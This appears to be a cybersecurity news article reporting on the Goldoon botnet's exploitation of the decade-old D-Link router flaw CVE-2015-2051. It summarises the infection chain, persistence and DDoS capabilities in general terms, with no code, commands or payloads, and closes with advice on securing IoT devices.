A newly identified botnet, known as Goldoon, has emerged with a focus on exploiting a long-standing vulnerability within D-Link routers. This vulnerability, designated as CVE-2015-2051, has been present for nearly ten years, affecting models like the D-Link DIR-645. The flaw permits remote attackers to execute arbitrary commands through specially crafted HTTP requests, with a severity score of 9.8 on the Common Vulnerability Scoring System (CVSS).
Cybersecurity researchers from Fortinet’s FortiGuard Labs have reported that if an attacker successfully compromises a target device, they can gain total control. This access enables the extraction of system information and communication with a command-and-control (C2) server, setting the stage for subsequent attacks, including distributed denial-of-service (DDoS) assaults. Observations indicate a surge in Goldoon’s botnet activity starting around April 9, 2024.
The exploitation process begins with the vulnerability allowing the retrieval of a dropper script from a remote server. This script is responsible for downloading additional payloads tailored for various Linux architectures, which include a broad array such as aarch64, arm, mips64, and more. Once launched, the payload acts as a downloader for the Goldoon malware, which subsequently removes its traces by deleting the dropper script itself.
In an attempt to thwart detection, any direct access to the command endpoint results in an amusing but unhelpful error message. Once established, Goldoon ensures persistence on the compromised host through multiple autorun methods and maintains communication with its C2 server, awaiting further command.
Goldoon’s capabilities extend to around 27 methods for executing DDoS attacks across various protocols, such as DNS, HTTP, and ICMP. While the underlying vulnerability is not new, its exploitation illustrates a critical risk that can easily result in remote code execution.
The rise of such botnets highlights the ongoing evolution of cyber threats targeting Internet of Things (IoT) devices. As cybercriminals increasingly leverage compromised routers as an anonymization layer, they can obscure their malicious activities within regular traffic patterns. According to a report by Trend Micro, these compromised devices are often repurposed for diverse criminal activities, including brute force attacks and proxying on phishing sites.
This situation calls attention to the importance of robust security measures for routers, which frequently lack stringent monitoring and may not receive timely updates. The vulnerabilities inherent in these devices are especially concerning, as they can effectively become tools for widespread cybercriminal endeavors.
This incident is reflective of a broader trend where both criminal organizations and nation-state threat actors exploit similar vulnerabilities for strategic gain. Cyber adversaries may even utilize off-the-shelf botnets, contributing further to their anonymity and efficiency in orchestrating malicious actions.
In summary, the Goldoon botnet exploit emphasizes the critical need for businesses to stay vigilant regarding the management and security of their IoT devices, as failure to do so can lead to severe repercussions, including significant operational disruptions. Given the sophistication of the tactics employed, understanding the relevant adversary techniques, as outlined in the MITRE ATT&CK framework, is crucial for formulating comprehensive defensive strategies against such pervasive threats.
